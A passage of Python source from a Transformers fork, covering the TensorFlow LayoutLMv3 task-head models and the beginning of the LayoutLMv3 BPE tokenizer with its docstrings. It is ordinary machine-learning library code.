bbox: Optional[tf.Tensor] = None,
pixel_values: Optional[tf.Tensor] = None,
training: Optional[bool] = False,
) -> Union[
TFSequenceClassifierOutput,
Tuple[tf.Tensor],
Tuple[tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor],
]:
"""
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, TFAutoModelForSequenceClassification
>>> from datasets import load_dataset
>>> import tensorflow as tf
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = TFAutoModelForSequenceClassification.from_pretrained("microsoft/layoutlmv3-base")
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> encoding = processor(image, words, boxes=boxes, return_tensors="tf")
>>> sequence_label = tf.convert_to_tensor([1])
>>> outputs = model(**encoding, labels=sequence_label)
>>> loss = outputs.loss
>>> logits = outputs.logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.layoutlmv3(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
bbox=bbox,
pixel_values=pixel_values,
training=training,
)
sequence_output = outputs[0][:, 0, :]
logits = self.classifier(sequence_output, training=training)
loss = None if labels is None else self.hf_compute_loss(labels, logits)
if not return_dict:
output = (logits,) + outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFSequenceClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForSequenceClassification.serving_output
def serving_output(self, output: TFSequenceClassifierOutput) -> TFSequenceClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFSequenceClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
LayoutLMv3 Model with a token classification head on top (a linear layer on top of the final hidden states) e.g.
for sequence labeling (information extraction) tasks such as [FUNSD](https://guillaumejaume.github.io/FUNSD/),
[SROIE](https://rrc.cvc.uab.es/?ch=13), [CORD](https://github.com/clovaai/cord) and
[Kleister-NDA](https://github.com/applicaai/kleister-nda).
""",
LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3ForTokenClassification(TFLayoutLMv3PreTrainedModel, TFTokenClassificationLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"position_ids"]
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(config, **kwargs)
self.num_labels = config.num_labels
self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
self.dropout = tf.keras.layers.Dropout(config.hidden_dropout_prob, name="dropout")
if config.num_labels < 10:
self.classifier = tf.keras.layers.Dense(
config.num_labels,
kernel_initializer=get_initializer(config.initializer_range),
name="classifier",
)
else:
self.classifier = TFLayoutLMv3ClassificationHead(config, name="classifier")
@unpack_inputs
@add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFTokenClassifierOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
input_ids: Optional[tf.Tensor] = None,
bbox: Optional[tf.Tensor] = None,
attention_mask: Optional[tf.Tensor] = None,
token_type_ids: Optional[tf.Tensor] = None,
position_ids: Optional[tf.Tensor] = None,
head_mask: Optional[tf.Tensor] = None,
inputs_embeds: Optional[tf.Tensor] = None,
labels: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
pixel_values: Optional[tf.Tensor] = None,
training: Optional[bool] = False,
) -> Union[
TFTokenClassifierOutput,
Tuple[tf.Tensor],
Tuple[tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor],
]:
r"""
labels (`tf.Tensor` of shape `(batch_size, sequence_length)`, *optional*):
Labels for computing the token classification loss. Indices should be in `[0, ..., config.num_labels - 1]`.
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, TFAutoModelForTokenClassification
>>> from datasets import load_dataset
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = TFAutoModelForTokenClassification.from_pretrained("microsoft/layoutlmv3-base", num_labels=7)
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> word_labels = example["ner_tags"]
>>> encoding = processor(image, words, boxes=boxes, word_labels=word_labels, return_tensors="tf")
>>> outputs = model(**encoding)
>>> loss = outputs.loss
>>> logits = outputs.logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.layoutlmv3(
input_ids,
bbox=bbox,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
pixel_values=pixel_values,
training=training,
)
if input_ids is not None:
input_shape = tf.shape(input_ids)
else:
input_shape = tf.shape(inputs_embeds)[:-1]
seq_length = input_shape[1]
# only take the text part of the output representations
sequence_output = outputs[0][:, :seq_length]
sequence_output = self.dropout(sequence_output, training=training)
logits = self.classifier(sequence_output)
loss = None if labels is None else self.hf_compute_loss(labels, logits)
if not return_dict:
output = (logits,) + outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFTokenClassifierOutput(
loss=loss,
logits=logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForTokenClassification.serving_output
def serving_output(self, output: TFTokenClassifierOutput) -> TFTokenClassifierOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFTokenClassifierOutput(logits=output.logits, hidden_states=hs, attentions=attns)
@add_start_docstrings(
"""
LayoutLMv3 Model with a span classification head on top for extractive question-answering tasks such as
[DocVQA](https://rrc.cvc.uab.es/?ch=17) (a linear layer on top of the text part of the hidden-states output to
compute `span start logits` and `span end logits`).
""",
LAYOUTLMV3_START_DOCSTRING,
)
class TFLayoutLMv3ForQuestionAnswering(TFLayoutLMv3PreTrainedModel, TFQuestionAnsweringLoss):
# names with a '.' represents the authorized unexpected/missing layers when a TF model is loaded from a PT model
_keys_to_ignore_on_load_unexpected = [r"position_ids"]
def __init__(self, config: LayoutLMv3Config, **kwargs):
super().__init__(config, **kwargs)
self.num_labels = config.num_labels
self.layoutlmv3 = TFLayoutLMv3MainLayer(config, name="layoutlmv3")
self.qa_outputs = TFLayoutLMv3ClassificationHead(config, name="qa_outputs")
@unpack_inputs
@add_start_docstrings_to_model_forward(LAYOUTLMV3_INPUTS_DOCSTRING)
@replace_return_docstrings(output_type=TFQuestionAnsweringModelOutput, config_class=_CONFIG_FOR_DOC)
def call(
self,
input_ids: Optional[tf.Tensor] = None,
attention_mask: Optional[tf.Tensor] = None,
token_type_ids: Optional[tf.Tensor] = None,
position_ids: Optional[tf.Tensor] = None,
head_mask: Optional[tf.Tensor] = None,
inputs_embeds: Optional[tf.Tensor] = None,
start_positions: Optional[tf.Tensor] = None,
end_positions: Optional[tf.Tensor] = None,
output_attentions: Optional[bool] = None,
output_hidden_states: Optional[bool] = None,
bbox: Optional[tf.Tensor] = None,
pixel_values: Optional[tf.Tensor] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> Union[
TFQuestionAnsweringModelOutput,
Tuple[tf.Tensor],
Tuple[tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor],
Tuple[tf.Tensor, tf.Tensor, tf.Tensor, tf.Tensor],
]:
r"""
start_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the start of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
end_positions (`tf.Tensor` of shape `(batch_size,)`, *optional*):
Labels for position (index) of the end of the labelled span for computing the token classification loss.
Positions are clamped to the length of the sequence (`sequence_length`). Position outside of the sequence
are not taken into account for computing the loss.
Returns:
Examples:
```python
>>> from transformers import AutoProcessor, TFAutoModelForQuestionAnswering
>>> from datasets import load_dataset
>>> import tensorflow as tf
>>> processor = AutoProcessor.from_pretrained("microsoft/layoutlmv3-base", apply_ocr=False)
>>> model = TFAutoModelForQuestionAnswering.from_pretrained("microsoft/layoutlmv3-base")
>>> dataset = load_dataset("nielsr/funsd-layoutlmv3", split="train")
>>> example = dataset[0]
>>> image = example["image"]
>>> question = "what's his name?"
>>> words = example["tokens"]
>>> boxes = example["bboxes"]
>>> encoding = processor(image, question, words, boxes=boxes, return_tensors="tf")
>>> start_positions = tf.convert_to_tensor([1])
>>> end_positions = tf.convert_to_tensor([3])
>>> outputs = model(**encoding, start_positions=start_positions, end_positions=end_positions)
>>> loss = outputs.loss
>>> start_scores = outputs.start_logits
>>> end_scores = outputs.end_logits
```"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.layoutlmv3(
input_ids,
attention_mask=attention_mask,
token_type_ids=token_type_ids,
position_ids=position_ids,
head_mask=head_mask,
inputs_embeds=inputs_embeds,
output_attentions=output_attentions,
output_hidden_states=output_hidden_states,
return_dict=return_dict,
bbox=bbox,
pixel_values=pixel_values,
training=training,
)
sequence_output = outputs[0]
logits = self.qa_outputs(sequence_output, training=training)
start_logits, end_logits = tf.split(value=logits, num_or_size_splits=2, axis=-1)
start_logits = tf.squeeze(input=start_logits, axis=-1)
end_logits = tf.squeeze(input=end_logits, axis=-1)
loss = None
if start_positions is not None and end_positions is not None:
labels = {"start_position": start_positions, "end_position": end_positions}
loss = self.hf_compute_loss(labels, logits=(start_logits, end_logits))
if not return_dict:
output = (start_logits, end_logits) + outputs[1:]
return ((loss,) + output) if loss is not None else output
return TFQuestionAnsweringModelOutput(
loss=loss,
start_logits=start_logits,
end_logits=end_logits,
hidden_states=outputs.hidden_states,
attentions=outputs.attentions,
)
# Copied from transformers.models.bert.modeling_tf_bert.TFBertForQuestionAnswering.serving_output
def serving_output(self, output: TFQuestionAnsweringModelOutput) -> TFQuestionAnsweringModelOutput:
hs = tf.convert_to_tensor(output.hidden_states) if self.config.output_hidden_states else None
attns = tf.convert_to_tensor(output.attentions) if self.config.output_attentions else None
return TFQuestionAnsweringModelOutput(
start_logits=output.start_logits, end_logits=output.end_logits, hidden_states=hs, attentions=attns
)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 72,784 | src/transformers/models/layoutlmv3/tokenization_layoutlmv3.py | # coding=utf-8
# Copyright The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tokenization class for LayoutLMv3. Same as LayoutLMv2, but RoBERTa-like BPE tokenization instead of WordPiece."""
import json
import os
from functools import lru_cache
from typing import Dict, List, Optional, Tuple, Union
import regex as re
from ...tokenization_utils import AddedToken, PreTrainedTokenizer
from ...tokenization_utils_base import (
BatchEncoding,
EncodedInput,
PreTokenizedInput,
TextInput,
TextInputPair,
TruncationStrategy,
)
from ...utils import PaddingStrategy, TensorType, add_end_docstrings, logging
logger = logging.get_logger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/vocab.json",
"microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/vocab.json",
},
"merges_file": {
"microsoft/layoutlmv3-base": "https://huggingface.co/microsoft/layoutlmv3-base/raw/main/merges.txt",
"microsoft/layoutlmv3-large": "https://huggingface.co/microsoft/layoutlmv3-large/raw/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"microsoft/layoutlmv3-base": 512,
"microsoft/layoutlmv3-large": 512,
}
LAYOUTLMV3_ENCODE_KWARGS_DOCSTRING = r"""
add_special_tokens (`bool`, *optional*, defaults to `True`):
Whether or not to encode the sequences with the special tokens relative to their model.
padding (`bool`, `str` or [`~file_utils.PaddingStrategy`], *optional*, defaults to `False`):
Activates and controls padding. Accepts the following values:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
truncation (`bool`, `str` or [`~tokenization_utils_base.TruncationStrategy`], *optional*, defaults to `False`):
Activates and controls truncation. Accepts the following values:
- `True` or `'longest_first'`: Truncate to a maximum length specified with the argument `max_length` or
to the maximum acceptable input length for the model if that argument is not provided. This will
truncate token by token, removing a token from the longest sequence in the pair if a pair of
sequences (or a batch of pairs) is provided.
- `'only_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the first sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `'only_second'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the second sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `False` or `'do_not_truncate'` (default): No truncation (i.e., can output batch with sequence lengths
greater than the model maximum admissible input size).
max_length (`int`, *optional*):
Controls the maximum length to use by one of the truncation/padding parameters.
If left unset or set to `None`, this will use the predefined model maximum length if a maximum length
is required by one of the truncation/padding parameters. If the model has no specific maximum input
length (like XLNet) truncation/padding to a maximum length will be deactivated.
stride (`int`, *optional*, defaults to 0):
If set to a number along with `max_length`, the overflowing tokens returned when
`return_overflowing_tokens=True` will contain some tokens from the end of the truncated sequence
returned to provide some overlap between truncated and overflowing sequences. The value of this
argument defines the number of overlapping tokens.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value. This is especially useful to enable
the use of Tensor Cores on NVIDIA hardware with compute capability `>= 7.5` (Volta).
return_tensors (`str` or [`~file_utils.TensorType`], *optional*):
If set, will return tensors instead of list of python integers. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return Numpy `np.ndarray` objects.
"""
LAYOUTLMV3_ENCODE_PLUS_ADDITIONAL_KWARGS_DOCSTRING = r"""
add_special_tokens (`bool`, *optional*, defaults to `True`):
Whether or not to encode the sequences with the special tokens relative to their model.
padding (`bool`, `str` or [`~utils.PaddingStrategy`], *optional*, defaults to `False`):
Activates and controls padding. Accepts the following values:
- `True` or `'longest'`: Pad to the longest sequence in the batch (or no padding if only a single
sequence if provided).
- `'max_length'`: Pad to a maximum length specified with the argument `max_length` or to the maximum
acceptable input length for the model if that argument is not provided.
- `False` or `'do_not_pad'` (default): No padding (i.e., can output a batch with sequences of different
lengths).
truncation (`bool`, `str` or [`~tokenization_utils_base.TruncationStrategy`], *optional*, defaults to `False`):
Activates and controls truncation. Accepts the following values:
- `True` or `'longest_first'`: Truncate to a maximum length specified with the argument `max_length` or
to the maximum acceptable input length for the model if that argument is not provided. This will
truncate token by token, removing a token from the longest sequence in the pair if a pair of
sequences (or a batch of pairs) is provided.
- `'only_first'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the first sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `'only_second'`: Truncate to a maximum length specified with the argument `max_length` or to the
maximum acceptable input length for the model if that argument is not provided. This will only
truncate the second sequence of a pair if a pair of sequences (or a batch of pairs) is provided.
- `False` or `'do_not_truncate'` (default): No truncation (i.e., can output batch with sequence lengths
greater than the model maximum admissible input size).
max_length (`int`, *optional*):
Controls the maximum length to use by one of the truncation/padding parameters. If left unset or set to
`None`, this will use the predefined model maximum length if a maximum length is required by one of the
truncation/padding parameters. If the model has no specific maximum input length (like XLNet)
truncation/padding to a maximum length will be deactivated.
stride (`int`, *optional*, defaults to 0):
If set to a number along with `max_length`, the overflowing tokens returned when
`return_overflowing_tokens=True` will contain some tokens from the end of the truncated sequence
returned to provide some overlap between truncated and overflowing sequences. The value of this
argument defines the number of overlapping tokens.
pad_to_multiple_of (`int`, *optional*):
If set will pad the sequence to a multiple of the provided value. This is especially useful to enable
the use of Tensor Cores on NVIDIA hardware with compute capability `>= 7.5` (Volta).
return_tensors (`str` or [`~utils.TensorType`], *optional*):
If set, will return tensors instead of list of python integers. Acceptable values are:
- `'tf'`: Return TensorFlow `tf.constant` objects.
- `'pt'`: Return PyTorch `torch.Tensor` objects.
- `'np'`: Return Numpy `np.ndarray` objects.
"""
@lru_cache()
# Copied from transformers.models.roberta.tokenization_roberta.bytes_to_unicode
def bytes_to_unicode():
"""
Returns list of utf-8 byte and a mapping to unicode strings. We specifically avoids mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
# Copied from transformers.models.roberta.tokenization_roberta.get_pairs
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class LayoutLMv3Tokenizer(PreTrainedTokenizer):
r"""
Construct a LayoutLMv3 tokenizer. Based on [`RoBERTatokenizer`] (Byte Pair Encoding or BPE).
[`LayoutLMv3Tokenizer`] can be used to turn words, word-level bounding boxes and optional word labels to
token-level `input_ids`, `attention_mask`, `token_type_ids`, `bbox`, and optional `labels` (for token
classification).
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
[`LayoutLMv3Tokenizer`] runs end-to-end tokenization: punctuation splitting and wordpiece. It also turns the
word-level bounding boxes into token-level bounding boxes.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
cls_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [CLS] token.
sep_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [SEP] token.
pad_token_box (`List[int]`, *optional*, defaults to `[0, 0, 0, 0]`):
The bounding box to use for the special [PAD] token.
pad_token_label (`int`, *optional*, defaults to -100):
The label to use for padding tokens. Defaults to -100, which is the `ignore_index` of PyTorch's
CrossEntropyLoss.
only_label_first_subword (`bool`, *optional*, defaults to `True`):
Whether or not to only label the first subword, in case word labels are provided.
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask", "bbox"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=True,
cls_token_box=[0, 0, 0, 0],
sep_token_box=[0, 0, 0, 0],
pad_token_box=[0, 0, 0, 0],
pad_token_label=-100,
only_label_first_subword=True,
**kwargs,
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
cls_token_box=cls_token_box,
sep_token_box=sep_token_box,
pad_token_box=pad_token_box,
pad_token_label=pad_token_label,
only_label_first_subword=only_label_first_subword,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
self.pat = re.compile(r"""'s|'t|'re|'ve|'m|'ll|'d| ?\p{L}+| ?\p{N}+| ?[^\s\p{L}\p{N}]+|\s+(?!\S)|\s+""")
# additional properties
self.cls_token_box = cls_token_box
self.sep_token_box = sep_token_box
self.pad_token_box = pad_token_box
self.pad_token_label = pad_token_label
self.only_label_first_subword = only_label_first_subword
@property
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.vocab_size
def vocab_size(self):
return len(self.encoder)
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.get_vocab
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.bpe
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer._tokenize
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer._convert_token_to_id
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer._convert_id_to_token
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.convert_tokens_to_string
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.save_vocabulary
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, indent=2, sort_keys=True, ensure_ascii=False) + "\n")
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.build_inputs_with_special_tokens
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.get_special_tokens_mask
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
# Copied from transformers.models.roberta.tokenization_roberta.RobertaTokenizer.create_token_type_ids_from_sequences
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
